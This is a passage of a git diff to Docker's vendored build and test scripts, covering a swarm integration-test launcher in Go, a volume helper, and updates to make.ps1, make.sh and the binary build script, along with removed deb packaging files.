pushImage(cli, *pushWorkerImage, defaultWorkerImageName); err != nil { + return 1, err + } + workerImageForStack = *pushWorkerImage + } + compose, err := createCompose("", cli, composeOptions{ + Replicas: *replicas, + Chunks: *chunks, + MasterImage: defaultMasterImageName, + WorkerImage: workerImageForStack, + Volume: defaultVolumeName, + Shuffle: *shuffle, + RandSeed: *randSeed, + DryRun: *dryRun, + KeepExecutor: *keepExecutor, + }) + if err != nil { + return 1, err + } + filters, err := filtersBytes(*filtersFile) + if err != nil { + return 1, err + } + logrus.Infof("Creating volume %s with input data", defaultVolumeName) + if err = 
createVolumeWithData(cli, + defaultVolumeName, + map[string][]byte{"/input": filters}, + defaultMasterImageName); err != nil { + return 1, err + } + logrus.Infof("Deploying stack %s from %s", defaultStackName, compose) + defer func() { + logrus.Infof("NOTE: You may want to inspect or clean up following resources:") + logrus.Infof(" - Stack: %s", defaultStackName) + logrus.Infof(" - Volume: %s", defaultVolumeName) + logrus.Infof(" - Compose file: %s", compose) + logrus.Infof(" - Master image: %s", defaultMasterImageName) + logrus.Infof(" - Worker image: %s", workerImageForStack) + }() + if err = deployStack(cli, defaultStackName, compose); err != nil { + return 1, err + } + logrus.Infof("The log will be displayed here after some duration."+ + "You can watch the live status via `docker service logs %s_worker`", + defaultStackName) + masterContainerID, err := waitForMasterUp(cli, defaultStackName) + if err != nil { + return 1, err + } + rc, err := waitForContainerCompletion(cli, os.Stdout, os.Stderr, masterContainerID) + if err != nil { + return 1, err + } + logrus.Infof("Exit status: %d", rc) + return int(rc), nil +} + +func ensureImages(cli *client.Client, images []string) error { + for _, image := range images { + _, _, err := cli.ImageInspectWithRaw(context.Background(), image) + if err != nil { + return fmt.Errorf("could not find image %s, please run `make build-integration-cli-on-swarm`: %v", + image, err) + } + } + return nil +} + +func filtersBytes(optionalFiltersFile string) ([]byte, error) { + var b []byte + if optionalFiltersFile == "" { + tests, err := enumerateTests(".") + if err != nil { + return b, err + } + b = []byte(strings.Join(tests, "\n") + "\n") + } else { + var err error + b, err = ioutil.ReadFile(optionalFiltersFile) + if err != nil { + return b, err + } + } + return b, nil +} + +func waitForMasterUp(cli *client.Client, stackName string) (string, error) { + // FIXME(AkihiroSuda): it should retry until master is up, rather than pre-sleeping + 
time.Sleep(10 * time.Second) + + fil := filters.NewArgs() + fil.Add("label", "com.docker.stack.namespace="+stackName) + // FIXME(AkihiroSuda): we should not rely on internal service naming convention + fil.Add("label", "com.docker.swarm.service.name="+stackName+"_master") + masters, err := cli.ContainerList(context.Background(), types.ContainerListOptions{ + All: true, + Filters: fil, + }) + if err != nil { + return "", err + } + if len(masters) == 0 { + return "", fmt.Errorf("master not running in stack %s?", stackName) + } + return masters[0].ID, nil +} + +func waitForContainerCompletion(cli *client.Client, stdout, stderr io.Writer, containerID string) (int64, error) { + stream, err := cli.ContainerLogs(context.Background(), + containerID, + types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Follow: true, + }) + if err != nil { + return 1, err + } + stdcopy.StdCopy(stdout, stderr, stream) + stream.Close() + resultC, errC := cli.ContainerWait(context.Background(), containerID, "") + select { + case err := <-errC: + return 1, err + case result := <-resultC: + return result.StatusCode, nil + } +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go new file mode 100644 index 0000000000..a6ddc6fae7 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go @@ -0,0 +1,88 @@ +package main + +import ( + "archive/tar" + "bytes" + "context" + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/client" +) + +func createTar(data map[string][]byte) (io.Reader, error) { + var b bytes.Buffer + tw := tar.NewWriter(&b) + for path, datum := range data { + hdr := tar.Header{ + Name: path, + Mode: 0644, + Size: int64(len(datum)), + } + if err := 
tw.WriteHeader(&hdr); err != nil { + return nil, err + } + _, err := tw.Write(datum) + if err != nil { + return nil, err + } + } + if err := tw.Close(); err != nil { + return nil, err + } + return &b, nil +} + +// createVolumeWithData creates a volume with the given data (e.g. data["/foo"] = []byte("bar")) +// Internally, a container is created from the image so as to provision the data to the volume, +// which is attached to the container. +func createVolumeWithData(cli *client.Client, volumeName string, data map[string][]byte, image string) error { + _, err := cli.VolumeCreate(context.Background(), + volume.VolumeCreateBody{ + Driver: "local", + Name: volumeName, + }) + if err != nil { + return err + } + mnt := "/mnt" + miniContainer, err := cli.ContainerCreate(context.Background(), + &container.Config{ + Image: image, + }, + &container.HostConfig{ + Mounts: []mount.Mount{ + { + Type: mount.TypeVolume, + Source: volumeName, + Target: mnt, + }, + }, + }, nil, "") + if err != nil { + return err + } + tr, err := createTar(data) + if err != nil { + return err + } + if cli.CopyToContainer(context.Background(), + miniContainer.ID, mnt, tr, types.CopyToContainerOptions{}); err != nil { + return err + } + return cli.ContainerRemove(context.Background(), + miniContainer.ID, + types.ContainerRemoveOptions{}) +} + +func hasVolume(cli *client.Client, volumeName string) bool { + _, err := cli.VolumeInspect(context.Background(), volumeName) + return err == nil +} + +func removeVolume(cli *client.Client, volumeName string) error { + return cli.VolumeRemove(context.Background(), volumeName, true) +} diff --git a/vendor/github.com/docker/docker/hack/make.ps1 b/vendor/github.com/docker/docker/hack/make.ps1 index 14b9603b2e..70b9a47726 100644 --- a/vendor/github.com/docker/docker/hack/make.ps1 +++ b/vendor/github.com/docker/docker/hack/make.ps1 @@ -17,11 +17,12 @@ development and Windows to Windows CI. 
Usage Examples (run from repo root): - "hack\make.ps1 -Binary" to build the binaries - "hack\make.ps1 -Client" to build just the client 64-bit binary + "hack\make.ps1 -Client" to build docker.exe client 64-bit binary (remote repo) "hack\make.ps1 -TestUnit" to run unit tests - "hack\make.ps1 -Binary -TestUnit" to build the binaries and run unit tests - "hack\make.ps1 -All" to run everything this script knows about + "hack\make.ps1 -Daemon -TestUnit" to build the daemon and run unit tests + "hack\make.ps1 -All" to run everything this script knows about that can run in a container + "hack\make.ps1" to build the daemon binary (same as -Daemon) + "hack\make.ps1 -Binary" shortcut to -Client and -Daemon .PARAMETER Client Builds the client binaries. @@ -30,7 +31,7 @@ Builds the daemon binary. .PARAMETER Binary - Builds the client binaries and the daemon binary. A convenient shortcut to `make.ps1 -Client -Daemon`. + Builds the client and daemon binaries. A convenient shortcut to `make.ps1 -Client -Daemon`. .PARAMETER Race Use -race in go build and go test. @@ -48,24 +49,23 @@ Adds a custom string to be appended to the commit ID (spaces are stripped). .PARAMETER DCO - Runs the DCO (Developer Certificate Of Origin) test. + Runs the DCO (Developer Certificate Of Origin) test (must be run outside a container). .PARAMETER PkgImports - Runs the pkg\ directory imports test. + Runs the pkg\ directory imports test (must be run outside a container). .PARAMETER GoFormat - Runs the Go formatting test. + Runs the Go formatting test (must be run outside a container). .PARAMETER TestUnit Runs unit tests. .PARAMETER All - Runs everything this script knows about. + Runs everything this script knows about that can run in a container. TODO - Unify the head commit -- Sort out the GITCOMMIT environment variable in the absense of a .git (longer term) - Add golint and other checks (swagger maybe?) 
#> @@ -88,6 +88,7 @@ param( ) $ErrorActionPreference = "Stop" +$ProgressPreference = "SilentlyContinue" $pushed=$False # To restore the directory if we have temporarily pushed to one. # Utility function to get the commit ID of the repository @@ -98,7 +99,7 @@ Function Get-GitCommit() { if ($env:DOCKER_GITCOMMIT.Length -eq 0) { Throw ".git directory missing and DOCKER_GITCOMMIT environment variable not specified." } - Write-Host "INFO: Git commit assumed from DOCKER_GITCOMMIT environment variable" + Write-Host "INFO: Git commit ($env:DOCKER_GITCOMMIT) assumed from DOCKER_GITCOMMIT environment variable" return $env:DOCKER_GITCOMMIT } $gitCommit=$(git rev-parse --short HEAD) @@ -113,12 +114,6 @@ Function Get-GitCommit() { return $gitCommit } -# Utility function to get get the current build version of docker -Function Get-DockerVersion() { - if (-not (Test-Path ".\VERSION")) { Throw "VERSION file not found. Is this running from the root of a docker repository?" } - return $(Get-Content ".\VERSION" -raw).ToString().Replace("`n","").Trim() -} - # Utility function to determine if we are running in a container or not. # In Windows, we get this through an environment variable set in `Dockerfile.Windows` Function Check-InContainer() { @@ -126,6 +121,25 @@ Function Check-InContainer() { Write-Host "" Write-Warning "Not running in a container. The result might be an incorrect build." Write-Host "" + return $False + } + return $True +} + +# Utility function to warn if the version of go is correct. Used for local builds +# outside of a container where it may be out of date with master. 
+Function Verify-GoVersion() { + Try { + $goVersionDockerfile=(Get-Content ".\Dockerfile" | Select-String "ENV GO_VERSION").ToString().Split(" ")[2] + $goVersionInstalled=(go version).ToString().Split(" ")[2].SubString(2) + } + Catch [Exception] { + Throw "Failed to validate go version correctness: $_" + } + if (-not($goVersionInstalled -eq $goVersionDockerfile)) { + Write-Host "" + Write-Warning "Building with golang version $goVersionInstalled. You should update to $goVersionDockerfile" + Write-Host "" } } @@ -156,7 +170,7 @@ Function Execute-Build($type, $additionalBuildTags, $directory) { if ($Race) { Write-Warning "Using race detector"; $raceParm=" -race"} if ($ForceBuildAll) { $allParm=" -a" } if ($NoOpt) { $optParm=" -gcflags "+""""+"-N -l"+"""" } - if ($addtionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) } + if ($additionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) } # Do the go build in the appropriate directory # Note -linkmode=internal is required to be able to debug on Windows. 
@@ -184,7 +198,7 @@ Function Validate-DCO($headCommit, $upstreamCommit) { $usernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+' $dcoPrefix="Signed-off-by:" - $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($usernameRegex)\\))?$" + $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \(github: ($usernameRegex)\))?$" $counts = Invoke-Expression "git diff --numstat $upstreamCommit...$headCommit" if ($LASTEXITCODE -ne 0) { Throw "Failed git diff --numstat" } @@ -237,10 +251,10 @@ Function Validate-PkgImports($headCommit, $upstreamCommit) { if ($LASTEXITCODE -ne 0) { Throw "Failed go list for dependencies on $file" } $imports = $imports -Replace "\[" -Replace "\]", "" -Split(" ") | Sort-Object | Get-Unique # Filter out what we are looking for - $imports = $imports -NotMatch "^github.com/docker/docker/pkg/" ` - -NotMatch "^github.com/docker/docker/vendor" ` - -Match "^github.com/docker/docker" ` - -Replace "`n", "" + $imports = @() + $imports -NotMatch "^github.com/docker/docker/pkg/" ` + -NotMatch "^github.com/docker/docker/vendor" ` + -Match "^github.com/docker/docker" ` + -Replace "`n", "" $imports | % { $badFiles+="$file imports $_`n" } } if ($badFiles.Length -eq 0) { @@ -261,7 +275,7 @@ Function Validate-GoFormat($headCommit, $upstreamCommit) { # Get a list of all go source-code files which have changed. 
Ignore exit code on next call - always process regardless $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'*.go`'" - $files = $files | Select-String -NotMatch "^vendor/" | Select-String -NotMatch "^cli/compose/schema/bindata.go" + $files = $files | Select-String -NotMatch "^vendor/" $badFiles=@(); $files | %{ # Deliberately ignore error on next line - treat as failed $content=Invoke-Expression "git show $headCommit`:$_" @@ -273,9 +287,10 @@ Function Validate-GoFormat($headCommit, $upstreamCommit) { $outputFile=[System.IO.Path]::GetTempFileName() if (Test-Path $outputFile) { Remove-Item $outputFile } [System.IO.File]::WriteAllText($outputFile, $content, (New-Object System.Text.UTF8Encoding($False))) - $valid=Invoke-Expression "gofmt -s -l $outputFile" - Write-Host "Checking $outputFile" - if ($valid.Length -ne 0) { $badFiles+=$_ } + $currentFile = $_ -Replace("/","\") + Write-Host Checking $currentFile + Invoke-Expression "gofmt -s -l $outputFile" + if ($LASTEXITCODE -ne 0) { $badFiles+=$currentFile } if (Test-Path $outputFile) { Remove-Item $outputFile } } if ($badFiles.Length -eq 0) { @@ -298,7 +313,7 @@ Function Run-UnitTests() { $pkgList = $pkgList | Select-String -Pattern "github.com/docker/docker" $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/vendor" $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/man" - $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration-cli" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration" $pkgList = $pkgList -replace "`r`n", " " $goTestCommand = "go test" + $raceParm + " -cover -ldflags -w -tags """ + "autogen daemon" + """ -a """ + "-test.timeout=10m" + """ $pkgList" Invoke-Expression $goTestCommand @@ -308,16 +323,21 @@ Function Run-UnitTests() { # Start of main code. 
Try { Write-Host -ForegroundColor Cyan "INFO: make.ps1 starting at $(Get-Date)" - $root=$(pwd) + + # Get to the root of the repo + $root = $(Split-Path $MyInvocation.MyCommand.Definition -Parent | Split-Path -Parent) + Push-Location $root # Handle the "-All" shortcut to turn on all things we can handle. - if ($All) { $Client=$True; $Daemon=$True; $DCO=$True; $PkgImports=$True; $GoFormat=$True; $TestUnit=$True } + # Note we expressly only include the items which can run in a container - the validations tests cannot + # as they require the .git directory which is excluded from the image by .dockerignore + if ($All) { $Client=$True; $Daemon=$True; $TestUnit=$True } # Handle the "-Binary" shortcut to build both client and daemon. if ($Binary) { $Client = $True; $Daemon = $True } - # Make sure we have something to do - if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { Throw 'Nothing to do. Try adding "-All" for everything I can do' } + # Default to building the daemon if not asked for anything explicitly. + if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { $Daemon=$True } # Verify git is installed if ($(Get-Command git -ErrorAction SilentlyContinue) -eq $nil) { Throw "Git does not appear to be installed" } @@ -329,12 +349,15 @@ Try { $gitCommit=Get-GitCommit if ($CommitSuffix -ne "") { $gitCommit += "-"+$CommitSuffix -Replace ' ', '' } - # Get the version of docker (eg 1.14.0-dev) - $dockerVersion=Get-DockerVersion + # Get the version of docker (eg 17.04.0-dev) + $dockerVersion="0.0.0-dev" # Give a warning if we are not running in a container and are building binaries or running unit tests. # Not relevant for validation tests as these are fine to run outside of a container. 
- if ($Client -or $Daemon -or $TestUnit) { Check-InContainer } + if ($Client -or $Daemon -or $TestUnit) { $inContainer=Check-InContainer } + + # If we are not in a container, validate the version of GO that is installed. + if (-not $inContainer) { Verify-GoVersion } # Verify GOPATH is set if ($env:GOPATH.Length -eq 0) { Throw "Missing GOPATH environment variable. See https://golang.org/doc/code.html#GOPATH" } @@ -342,7 +365,7 @@ Try { # Run autogen if building binaries or running unit tests. if ($Client -or $Daemon -or $TestUnit) { Write-Host "INFO: Invoking autogen..." - Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion } + Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion -Platform "$env:PLATFORM" } Catch [Exception] { Throw $_ } } @@ -369,7 +392,32 @@ Try { # Perform the actual build if ($Daemon) { Execute-Build "daemon" "daemon" "dockerd" } - if ($Client) { Execute-Build "client" "" "docker" } + if ($Client) { + # Get the Docker channel and version from the environment, or use the defaults. + if (-not ($channel = $env:DOCKERCLI_CHANNEL)) { $channel = "edge" } + if (-not ($version = $env:DOCKERCLI_VERSION)) { $version = "17.06.0-ce" } + + # Download the zip file and extract the client executable. + Write-Host "INFO: Downloading docker/cli version $version from $channel..." 
+ $url = "https://download.docker.com/win/static/$channel/x86_64/docker-$version.zip" + Invoke-WebRequest $url -OutFile "docker.zip" + Try { + Add-Type -AssemblyName System.IO.Compression.FileSystem + $zip = [System.IO.Compression.ZipFile]::OpenRead("$PWD\docker.zip") + Try { + if (-not ($entry = $zip.Entries | Where-Object { $_.Name -eq "docker.exe" })) { + Throw "Cannot find docker.exe in $url" + } + [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, "$PWD\bundles\docker.exe", $true) + } + Finally { + $zip.Dispose() + } + } + Finally { + Remove-Item -Force "docker.zip" + } + } } # Run unit tests @@ -403,6 +451,7 @@ Catch [Exception] { Throw $_ } Finally { + Pop-Location # As we pushed to the root of the repo as the very first thing if ($global:pushed) { Pop-Location } Write-Host -ForegroundColor Cyan "INFO: make.ps1 ended at $(Get-Date)" } diff --git a/vendor/github.com/docker/docker/hack/make.sh b/vendor/github.com/docker/docker/hack/make.sh index f0e482feda..cd9232a4a5 100755 --- a/vendor/github.com/docker/docker/hack/make.sh +++ b/vendor/github.com/docker/docker/hack/make.sh @@ -36,7 +36,7 @@ if [ "$(go env GOHOSTOS)" = 'windows' ]; then unset inContainer fi else - if [ "$PWD" != "/go/src/$DOCKER_PKG" ] || [ -z "$DOCKER_CROSSPLATFORMS" ]; then + if [ "$PWD" != "/go/src/$DOCKER_PKG" ]; then unset inContainer fi fi @@ -56,21 +56,20 @@ echo # List of bundles to create when no argument is passed DEFAULT_BUNDLES=( - binary-client binary-daemon dynbinary - test-unit - test-integration-cli + test-integration test-docker-py cross - tgz ) -VERSION=$(< ./VERSION) -! BUILDTIME=$(date --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/') -if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; then +VERSION=${VERSION:-dev} +! 
BUILDTIME=$(date -u -d "@${SOURCE_DATE_EPOCH:-$(date +%s)}" --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/') +if [ "$DOCKER_GITCOMMIT" ]; then + GITCOMMIT="$DOCKER_GITCOMMIT" +elif command -v git &> /dev/null && [ -e .git ] && git rev-parse &> /dev/null; then GITCOMMIT=$(git rev-parse --short HEAD) if [ -n "$(git status --porcelain --untracked-files=no)" ]; then GITCOMMIT="$GITCOMMIT-unsupported" @@ -83,8 +82,6 @@ if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; the git status --porcelain --untracked-files=no echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" fi -elif [ "$DOCKER_GITCOMMIT" ]; then - GITCOMMIT="$DOCKER_GITCOMMIT" else echo >&2 'error: .git directory missing and DOCKER_GITCOMMIT not specified' echo >&2 ' Please either build with the .git directory accessible, or specify the' @@ -98,13 +95,6 @@ if [ "$AUTO_GOPATH" ]; then mkdir -p .gopath/src/"$(dirname "${DOCKER_PKG}")" ln -sf ../../../.. .gopath/src/"${DOCKER_PKG}" export GOPATH="${PWD}/.gopath" - - if [ "$(go env GOOS)" = 'solaris' ]; then - # sys/unix is installed outside the standard library on solaris - # TODO need to allow for version change, need to get version from go - export GO_VERSION=${GO_VERSION:-"1.7.1"} - export GOPATH="${GOPATH}:/usr/lib/gocode/${GO_VERSION}" - fi fi if [ ! "$GOPATH" ]; then @@ -113,7 +103,12 @@ if [ ! "$GOPATH" ]; then exit 1 fi -DOCKER_BUILDTAGS+=" daemon" +# Adds $1_$2 to DOCKER_BUILDTAGS unless it already +# contains a word starting from $1_ +add_buildtag() { + [[ " $DOCKER_BUILDTAGS" == *" $1_"* ]] || DOCKER_BUILDTAGS+=" $1_$2" +} + if ${PKG_CONFIG} 'libsystemd >= 209' 2> /dev/null ; then DOCKER_BUILDTAGS+=" journald" elif ${PKG_CONFIG} 'libsystemd-journal' 2> /dev/null ; then @@ -129,18 +124,19 @@ if \ fi # test whether "libdevmapper.h" is new enough to support deferred remove -# functionality. +# functionality. 
We favour libdm_dlsym_deferred_remove over +# libdm_no_deferred_remove in dynamic cases because the binary could be shipped +# with a newer libdevmapper than the one it was built wih. if \ command -v gcc &> /dev/null \ - && ! ( echo -e '#include \nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null -ldevmapper &> /dev/null ) \ + && ! ( echo -e '#include \nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null $(pkg-config --libs devmapper) &> /dev/null ) \ ; then - DOCKER_BUILDTAGS+=' libdm_no_deferred_remove' + add_buildtag libdm dlsym_deferred_remove fi # Use these flags when compiling the tests and final binary IAMSTATIC='true' -source "$SCRIPTDIR/make/.go-autogen" if [ -z "$DOCKER_DEBUG" ]; then LDFLAGS='-w' fi @@ -149,21 +145,21 @@ LDFLAGS_STATIC='' EXTLDFLAGS_STATIC='-static' # ORIG_BUILDFLAGS is necessary for the cross target which cannot always build # with options like -race. -ORIG_BUILDFLAGS=( -tags "autogen netgo static_build sqlite_omit_load_extension $DOCKER_BUILDTAGS" -installsuffix netgo ) +ORIG_BUILDFLAGS=( -tags "autogen netgo static_build $DOCKER_BUILDTAGS" -installsuffix netgo ) # see https://github.com/golang/go/issues/9369#issuecomment-69864440 for why -installsuffix is necessary here # When $DOCKER_INCREMENTAL_BINARY is set in the environment, enable incremental # builds by installing dependent packages to the GOPATH. REBUILD_FLAG="-a" -if [ "$DOCKER_INCREMENTAL_BINARY" ]; then +if [ "$DOCKER_INCREMENTAL_BINARY" == "1" ] || [ "$DOCKER_INCREMENTAL_BINARY" == "true" ]; then REBUILD_FLAG="-i" fi ORIG_BUILDFLAGS+=( $REBUILD_FLAG ) BUILDFLAGS=( $BUILDFLAGS "${ORIG_BUILDFLAGS[@]}" ) -# Test timeout. -if [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then +# Test timeout. 
+if [ "${DOCKER_ENGINE_GOARCH}" == "arm64" ] || [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then : ${TIMEOUT:=10m} elif [ "${DOCKER_ENGINE_GOARCH}" == "windows" ]; then : ${TIMEOUT:=8m} @@ -186,101 +182,25 @@ if [ "$(uname -s)" = 'FreeBSD' ]; then LDFLAGS="$LDFLAGS -extld clang" fi -# If sqlite3.h doesn't exist under /usr/include, -# check /usr/local/include also just in case -# (e.g. FreeBSD Ports installs it under the directory) -if [ ! -e /usr/include/sqlite3.h ] && [ -e /usr/local/include/sqlite3.h ]; then - export CGO_CFLAGS='-I/usr/local/include' - export CGO_LDFLAGS='-L/usr/local/lib' -fi - -HAVE_GO_TEST_COVER= -if \ - go help testflag | grep -- -cover > /dev/null \ - && go tool -n cover > /dev/null 2>&1 \ -; then - HAVE_GO_TEST_COVER=1 -fi - -# a helper to provide ".exe" when it's appropriate -binary_extension() { - if [ "$(go env GOOS)" = 'windows' ]; then - echo -n '.exe' - fi -} - -hash_files() { - while [ $# -gt 0 ]; do - f="$1" - shift - dir="$(dirname "$f")" - base="$(basename "$f")" - for hashAlgo in md5 sha256; do - if command -v "${hashAlgo}sum" &> /dev/null; then - ( - # subshell and cd so that we get output files like: - # $HASH docker-$VERSION - # instead of: - # $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION - cd "$dir" - "${hashAlgo}sum" "$base" > "$base.$hashAlgo" - ) - fi - done - done -} - bundle() { local bundle="$1"; shift echo "---> Making bundle: $(basename "$bundle") (in $DEST)" source "$SCRIPTDIR/make/$bundle" "$@" } -copy_binaries() { - dir="$1" - # Add nested executables to bundle dir so we have complete set of - # them available, but only if the native OS/ARCH is the same as the - # OS/ARCH of the build target - if [ "$(go env GOOS)/$(go env GOARCH)" == "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then - if [ -x /usr/local/bin/docker-runc ]; then - echo "Copying nested executables into $dir" - for file in containerd containerd-shim containerd-ctr runc init proxy; do - cp `which "docker-$file"` "$dir/" - if [ "$2" == 
"hash" ]; then - hash_files "$dir/docker-$file" - fi - done - fi - fi -} - -install_binary() { - file="$1" - target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/" - if [ "$(go env GOOS)" == "linux" ]; then - echo "Installing $(basename $file) to ${target}" - cp -L "$file" "$target" - else - echo "Install is only supported on linux" - return 1 - fi -} - main() { - # We want this to fail if the bundles already exist and cannot be removed. - # This is to avoid mixing bundles from different versions of the code. - mkdir -p bundles - if [ -e "bundles/$VERSION" ] && [ -z "$KEEPBUNDLE" ]; then - echo "bundles/$VERSION already exists. Removing." - rm -fr "bundles/$VERSION" && mkdir "bundles/$VERSION" || exit 1 + if [ -z "${KEEPBUNDLE-}" ]; then + echo "Removing bundles/" + rm -rf "bundles/*" echo fi + mkdir -p bundles + # Windows and symlinks don't get along well if [ "$(go env GOHOSTOS)" != 'windows' ]; then - # Windows and symlinks don't get along well - rm -f bundles/latest - ln -s "$VERSION" bundles/latest + # preserve latest symlink for backward compatibility + ln -sf . bundles/latest fi if [ $# -lt 1 ]; then @@ -289,7 +209,7 @@ main() { bundles=($@) fi for bundle in ${bundles[@]}; do - export DEST="bundles/$VERSION/$(basename "$bundle")" + export DEST="bundles/$(basename "$bundle")" # Cygdrive paths don't play well with go build -o. 
if [[ "$(uname -s)" == CYGWIN* ]]; then export DEST="$(cygpath -mw "$DEST")" diff --git a/vendor/github.com/docker/docker/hack/make/.binary b/vendor/github.com/docker/docker/hack/make/.binary index f5c35c3b7e..9375926d6b 100644 --- a/vendor/github.com/docker/docker/hack/make/.binary +++ b/vendor/github.com/docker/docker/hack/make/.binary @@ -1,12 +1,42 @@ -#!/bin/bash +#!/usr/bin/env bash set -e +# a helper to provide ".exe" when it's appropriate +binary_extension() { + if [ "$(go env GOOS)" = 'windows' ]; then + echo -n '.exe' + fi +} + +GO_PACKAGE='github.com/docker/docker/cmd/dockerd' +BINARY_SHORT_NAME='dockerd' BINARY_NAME="$BINARY_SHORT_NAME-$VERSION" BINARY_EXTENSION="$(binary_extension)" BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" source "${MAKEDIR}/.go-autogen" +hash_files() { + while [ $# -gt 0 ]; do + f="$1" + shift + dir="$(dirname "$f")" + base="$(basename "$f")" + for hashAlgo in md5 sha256; do + if command -v "${hashAlgo}sum" &> /dev/null; then + ( + # subshell and cd so that we get output files like: + # $HASH docker-$VERSION + # instead of: + # $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION + cd "$dir" + "${hashAlgo}sum" "$base" > "$base.$hashAlgo" + ) + fi + done + done +} + ( export GOGC=${DOCKER_BUILD_GOGC:-1000} @@ -20,15 +50,9 @@ if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARC esac fi -if [ "$IAMSTATIC" == "true" ] && [ "$(go env GOHOSTOS)" == "linux" ]; then - if [ "${GOOS}/${GOARCH}" == "darwin/amd64" ]; then - export CGO_ENABLED=1 - export CC=o64-clang - export LDFLAGS='-linkmode external -s' - export LDFLAGS_STATIC_DOCKER='-extld='${CC} - else - export BUILDFLAGS=( "${BUILDFLAGS[@]/pkcs11 /}" ) # we cannot dlopen in pkcs11 in a static binary - fi +# -buildmode=pie is not supported on Windows. 
+if [ "$(go env GOOS)" != "windows" ]; then + BUILDFLAGS+=( "-buildmode=pie" ) fi echo "Building: $DEST/$BINARY_FULLNAME" @@ -38,6 +62,7 @@ go build \ -ldflags " $LDFLAGS $LDFLAGS_STATIC_DOCKER + $DOCKER_LDFLAGS " \ $GO_PACKAGE ) diff --git a/vendor/github.com/docker/docker/hack/make/.binary-setup b/vendor/github.com/docker/docker/hack/make/.binary-setup index b9f8ce2517..15de89fe10 100644 --- a/vendor/github.com/docker/docker/hack/make/.binary-setup +++ b/vendor/github.com/docker/docker/hack/make/.binary-setup @@ -1,6 +1,5 @@ -#!/bin/bash +#!/usr/bin/env bash -DOCKER_CLIENT_BINARY_NAME='docker' DOCKER_DAEMON_BINARY_NAME='dockerd' DOCKER_RUNC_BINARY_NAME='docker-runc' DOCKER_CONTAINERD_BINARY_NAME='docker-containerd' diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/compat b/vendor/github.com/docker/docker/hack/make/.build-deb/compat deleted file mode 100644 index ec635144f6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/compat +++ /dev/null @@ -1 +0,0 @@ -9 diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/control b/vendor/github.com/docker/docker/hack/make/.build-deb/control deleted file mode 100644 index 0f5439947c..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/control +++ /dev/null @@ -1,29 +0,0 @@ -Source: docker-engine -Section: admin -Priority: optional -Maintainer: Docker -Standards-Version: 3.9.6 -Homepage: https://dockerproject.org -Vcs-Browser: https://github.com/docker/docker -Vcs-Git: git://github.com/docker/docker.git - -Package: docker-engine -Architecture: linux-any -Depends: iptables, ${misc:Depends}, ${perl:Depends}, ${shlibs:Depends} -Recommends: aufs-tools, - ca-certificates, - cgroupfs-mount | cgroup-lite, - git, - xz-utils, - ${apparmor:Recommends} -Conflicts: docker (<< 1.5~), docker.io, lxc-docker, lxc-docker-virtual-package, docker-engine-cs -Description: Docker: the open-source application container engine - Docker is an open source project to build, ship and 
run any application as a - lightweight container - . - Docker containers are both hardware-agnostic and platform-agnostic. This means - they can run anywhere, from your laptop to the largest EC2 compute instance and - everything in between - and they don't require you to use a particular - language, framework or packaging system. That makes them great building blocks - for deploying and scaling web apps, databases, and backend services without - depending on a particular stack or provider. diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion deleted file mode 100644 index 6ea1119308..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion +++ /dev/null @@ -1 +0,0 @@ -contrib/completion/bash/docker diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default deleted file mode 120000 index 4278533d65..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/init/sysvinit-debian/docker.default \ No newline at end of file diff --git 